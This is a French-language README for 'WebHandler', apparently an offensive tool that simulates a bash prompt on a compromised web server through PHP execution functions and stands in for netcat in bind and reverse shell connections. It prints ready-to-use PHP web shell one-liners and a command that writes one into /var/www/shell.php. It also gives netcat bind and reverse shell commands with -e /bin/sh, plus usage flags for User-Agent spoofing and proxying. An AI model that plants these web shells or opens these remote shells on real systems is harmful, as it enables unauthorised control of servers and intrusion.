
Simulateur Bash pour contrôler un serveur à l'aide de fonctions système PHP.
Un gestionnaire pour les fonctions système PHP et aussi une alternative au gestionnaire 'netcat'
WebHandler essaie de simuler une invite 'bash Linux' pour gérer et traiter :
- Fonctions d'exécution de programmes PHP _(par ex. `system`, `passthru`, `exec`, etc.)_
- Connexions Bind shell
- Connexions de shell de réserve
Une autre fonctionnalité est de falsifier le champ "User-Agent" dans l'en-tête HTTP. (--random-angent).
Il supporte également les proxys HTTP (--proxy http://<ip>:<port>)
WebHandler fonctionne pour les requêtes POST et GET :
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>WebHandler est un remplacement pour les connexions netcat.
Un exemple de connexion bind shell (par ex. nc -lvvp 1234 -e /bin/sh)
Normalement, l'utilisateur ferait :
netcat -l -p 1234nc -lvvp 1234Un exemple de connexion inversée (par ex. nc 127.0.0.1 4321 -e /bin/sh)
Normalement, l'utilisateur ferait :
netcat -l -p 4321nc -lvvp 4321--Exemple de fichier :
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url est un argument obligatoire lors de l'envoi de requêtes GET ou POST (par ex. une connexion bind shell 'basée sur PHP via le web') :
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen est un argument obligatoire lors de l'attente d'une connexion (par ex. une connexion inversée 'brute') :
python webhandler.py --listen 1234Si la version de votre Python est < 2.7.x, alors argparse est requis
Pour l'installer, exécutez : sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse OU sudo pip --install argparse.
readline est optionnel. Ce module est utilisé pour fournir des fonctionnalités avancées d'édition de ligne et d'historique.
git est optionnel. Cela permet de maintenir le projet à jour.
[Bugs connus][]